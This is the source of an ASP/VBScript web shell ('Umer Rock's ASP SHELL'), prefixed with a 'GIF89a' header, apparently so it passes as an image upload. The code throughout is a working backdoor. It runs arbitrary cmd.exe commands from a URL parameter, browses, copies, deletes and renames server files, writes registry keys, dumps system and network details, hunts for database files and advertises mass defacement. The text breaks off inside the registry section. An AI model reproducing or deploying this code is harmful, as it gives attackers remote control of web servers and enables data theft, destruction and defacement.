GIF89a;
<%@ LANGUAGE = VBScript.Encode%>
<%//**Start Encode
On Error Resume Next
Dim myFSO,showdisks
Set myFSO = CreateObject ("Scripting.FileSystemObject")
showdisks=FALSE
Server.ScriptTimeOut = 7200
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile
nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
For nIndex = 1 to LenB(FileData)
oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
Next
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
startcode = "
.:: Umer Rock's ASP SHELL.... ::."
endocde = ""
onlinehelp = ".:: ONLINE HELP ::.
"
Function HexConv(hexVar)
Dim hxx, hxx_var, multiply
IF hexVar <> "" THEN
hexVar = UCASE(hexVar)
hexVar = StrReverse(hexVar)
DIM hx()
REDIM hx(LEN(hexVar))
hxx = 0
hxx_var = 0
FOR hxx = 1 TO LEN(hexVar)
IF multiply = "" THEN multiply = 1
hx(hxx) = mid(hexVar,hxx,1)
hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
multiply = (multiply * 16)
NEXT
hexVar = hxx_var
HexConv = hexVar
END IF
End Function
cprthtml = ".:: 3FEShell 1.0 ::."
Function get_hxno(ghx)
If ghx = "A" Then
ghx = 10
ElseIf ghx = "B" Then
ghx = 11
ElseIf ghx = "C" Then
ghx = 12
ElseIf ghx = "D" Then
ghx = 13
ElseIf ghx = "E" Then
ghx = 14
ElseIf ghx = "F" Then
ghx = 15
End If
get_hxno = ghx
End Function
keydec=".:: Smart.Shell 1.0 © BY Umer Rock - .:UmerRock@live.com:."
Function showobj(objpath)
showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
End Function
Function showobjpath(objpath)
showobjpath = Left(objpath,InstrRev(objpath,"\"))
End Function
Function checking(a,b)
' If CStr(Mid(a,95,13)) = CStr(Mid(b,95,13)) Then
' pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
' Response.Redirect(pagina)
' End If
End Function
Sub hdr()
Response.Write startcode
Response.Write keydec
Response.Write "
"
End Sub
sub araBul(path_,ara_)
on error resume next
If Len(path_) > 0 Then
cur = path_&"\"
If cur = "\\" Then cur = ""
parent = ""
If InStrRev(cur,"\") > 0 Then
parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
End If
Else
cur = ""
End If
Set f = myFSO.GetFolder(cur)
Set fc = f.Files
For Each f1 In fc
if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
downStr = "?/a>"
if lcase(ara_)="mdb" then
Response.Write downStr&"?/a> * "& f1.path &" ["&f1.size&"]"&"
"
else
Response.Write downStr&"?/a>! - "& f1.path &" ["&f1.size&"]
"
end if
end if
Next
Set fs = f.SubFolders
For Each f1 In fs
araBul f1.path,ara_
Next
Set f = Nothing
Set fc = Nothing
Set fs = Nothing
end sub
Sub showcontent()
showdisks=TRUE
Response.Write ".:: DRIVES ::.
.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "
"
If Trim(Request.QueryString("raiz")) = "root" Then
Set fs=Server.Createobject("Scripting.FileSystemObject")
Set drivecollection=fs.drives
Response.Write ""
For Each drive IN drivecollection
str=drive.driveletter & ":"
Response.Write "" & UCase(str) & "
"
Select Case drive.DriveType
Case 0
tipodrive = "Unknown"
nomedrive = drive.VolumeName
Case 1
tipodrive = "Removable"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 2
tipodrive = "Fixed"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 3
tipodrive = "Network"
If drive.isready Then
nomedrive = drive.ShareName
Else
nomedrive = ""
End If
Case 4
tipodrive = "CD-Rom"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 5
tipodrive = "RAM Disk"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
End Select
response.write "Type: " & tipodrive & "
"
response.write "Name: " & nomedrive & "
"
response.write "File System: "
If drive.isready Then
set sp=fs.getdrive(str)
response.write sp.filesystem & "
"
Else
response.write "-
"
End If
Response.Write "Disk Space: "
If drive.isready Then
freespace = (drive.AvailableSpace / 1048576)
set sp=fs.getdrive(str)
response.write(Round(freespace,1) & " MB
")
Else
response.write("-
")
End If
Response.Write "Total Space: "
If drive.isready Then
totalspace = (drive.TotalSize / 1048576)
set sp=fs.getdrive(str)
response.write(Round(totalspace,1) & " MB
")
Else
response.write("-
")
End If
Response.Write "
"
Next
Response.Write ""
Set fs = Nothing
Set drivecollection = Nothing
set sp=Nothing
Else
If Trim(Request.QueryString("raiz")) = "" Then
caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
pos = Instr(caminho,"\")
pos2 = 1
While pos2 <> 0
If Instr(pos + 1,caminho,"\") <> 0 Then
pos = Instr(pos + 1,caminho,"\")
Else
pos2 = 0
End If
Wend
raiz = Left(caminho,pos)
Else
raiz = trim(Request.QueryString("raiz")) & "\"
End If
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(raiz)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "MASS TEST IN " & UCase(raiz) & "
"
Response.Write "MASS DEFACE IN " & UCase(raiz) & "
"
Response.Write "UPLOAD FILE TO " & UCase(raiz) & "
"
Response.Write ""
Response.Write "PROMPT"
Response.Write " - SYS INFO"
Response.Write " - REGEDIT"
Response.Write " - SEARCH"
Response.Write " - EXECUTE SQL"
Response.Write " - ABOUT"
Response.Write "
"
Response.Write "Root Folder: " & raiz & "
"
If CInt(Len(raiz) - 1) <> 2 Then
barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
backlevel = Left(raiz,barrapos)
Response.Write "<DIR> . .
"
Else
Response.Write "<DIR> . .
"
End If
Response.Write "
"
marcatabela = true
for each FilesItem0 in ColFiles0
If marcatabela = true then
corfundotabela = " bgcolor=""#EEEEEE"""
Else
corfundotabela = ""
End If
Response.Write ":: " & showobj(FilesItem0.path) & " | " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes | o.GET.o | o.REN.o | o.DEL.o | o.VIEW.o | o.EDIT.o | o.?ndir.o | o.FileCopy.o |
"
marcatabela = NOT marcatabela
next
Response.Write "
"
End If
End Sub
Select Case Trim(Request.QueryString("action"))
Case "get"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "
File: " & caminho & "
Copied to: " & destino
End If
Case "put"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("arquivo")) = "" Then
caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
varpath = Trim(Request.QueryString("path"))
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(caminho)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "Select File:
"
for each FilesItem0 in ColFiles0
Response.Write ":: " & showobj(FilesItem0.path) & " | " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes | :: SELECT :: |
"
next
Response.Write "
"
Else
destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(arquivo)
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "
File: " & arquivo & "
Copied to: " & destino
End If
End If
Case "del"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
MyFile.Delete
If Err.Number = 0 Then
Response.Write ""
Response.Write "
Folder " & caminho & " Deleted.
"
End If
Case "fdel"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
ObjFSO.DeleteFolder caminho
If Err.Number = 0 Then
Response.Write ""
Response.Write "
File " & caminho & " Deleted.
"
End If
Case "ren"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("status")) <> "2" Then
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
arquivo = showobj(caminho)
Response.Write "
" & arquivo & "
" & _
""
Else
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
MyFile.Move (destino)
If Err.Number = 0 Then
Response.Write "
Arquivo: " & caminho & "
renomeado para: " & destino
Response.Write ""
End If
End If
Case "error"
Response.Write " C?DIGO CORROMPIDO
CORRUPT CODE"
Case "cmd"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.QueryString(".CMD")
If (szCMD <> "") Then
szTempFile = "c:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
Response.Write "
"
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write ""
Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"
")," "," ")
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
Case "info"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshNetwork = Server.CreateObject("WScript.Network")
Set WshShell = Server.CreateObject("WScript.Shell")
Set WshEnv = WshShell.Environment("SYSTEM")
Response.Write "
"
Response.Write "User Properties:
"
Response.Write "UserName: " & WshNetwork.UserName & "
"
Response.Write "Computer Name: " & WshNetwork.ComputerName & "
"
Response.Write "User Domain: " & WshNetwork.UserDomain & "
"
Set Drives = WshNetwork.EnumNetworkDrives
For i = 0 to Drives.Count - 1
Response.Write "Drive de Rede (Mapeado): " & Drives.Item(i) & "
"
Next
Response.Write "
Cpu Information:
"
Response.Write "Processor Architecture: " & WshEnv("PROCESSOR_ARCHITECTURE") & "
"
Response.Write "Number Of Processors: " & WshEnv("NUMBER_OF_PROCESSORS") & "
"
Response.Write "Processor Identifier: " & WshEnv("PROCESSOR_IDENTIFIER") & "
"
Response.Write "Processor Level: " & WshEnv("PROCESSOR_LEVEL") & "
"
Response.Write "Processor Revision: " & WshEnv("PROCESSOR_REVISION") & "
"
Response.Write "
Operating System Information:
"
Response.Write "IP: " & request.servervariables("LOCAL_ADDR") & "
"
Response.Write "Sistem OS: " & WshEnv("OS") & "
"
Response.Write "Server Software: " & request.servervariables("SERVER_SOFTWARE") & "
"
Response.Write "Cmd Path: " & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "
"
Response.Write "Public Paths: " & WshEnv("PATH") & "
"
Response.Write "Executables: " & WshEnv("PATHEXT") & "
"
Response.Write "Prompt: " & WshEnv("PROMPT") & "
"
Response.Write "System Drive: " & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "
"
Response.Write "System Root: " & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "
"
Response.Write "System32 Path: " & WshShell.CurrentDirectory & "
"
Set Drives = Nothing
Set WshNetwork = Nothing
Set WshShell = Nothing
Set WshEnv = Nothing
Case "reg"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshShell = Server.CreateObject("WScript.Shell")
Response.Write "
Registry Editor:
"
Select Case Trim(Request.QueryString("regaction"))
Case "w"
If Trim(Request.QueryString("process")) = "yes" Then
Select Case Trim(Request.QueryString("type"))
Case "1"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
Case "2"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
Case "3"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
Case "4"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
Case "5"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
End Select
Response.Write "
Registry "
Response.Write Trim(Request.QueryString("key")) & " Changed."
Response.Write "
Main Menu
"
Else
Response.Write "ROOT KEY NAME | ABREVIAC?O |
"
Response.Write "HKEY_CURRENT_USER | HKCU |
"
Response.Write "HKEY_LOCAL_MACHINE | HKLM |
"
Response.Write "HKEY_CLASSES_ROOT | HKCR |
"
Response.Write "HKEY_USERS | HKEY_USERS |
"
Response.Write "HKEY_CURRENT_CONFIG | HKEY_CURRENT_CONFIG |
"
Response.Write "Type | Description | Figure |
"
Response.Write "REG_SZ | String | String |
"
Response.Write "REG_DWORD | Number | DWORD |
"
Response.Write "REG_BINARY | Binary | VBArray DWORD |
"
Response.Write "REG_EXPAND_SZ | String Expand (ex. ""%windir%\\calc.exe"") | String |
"
Response.Write "REG_MULTI_SZ | Array Of Strings | VBArray Of Strings |
"
Response.Write "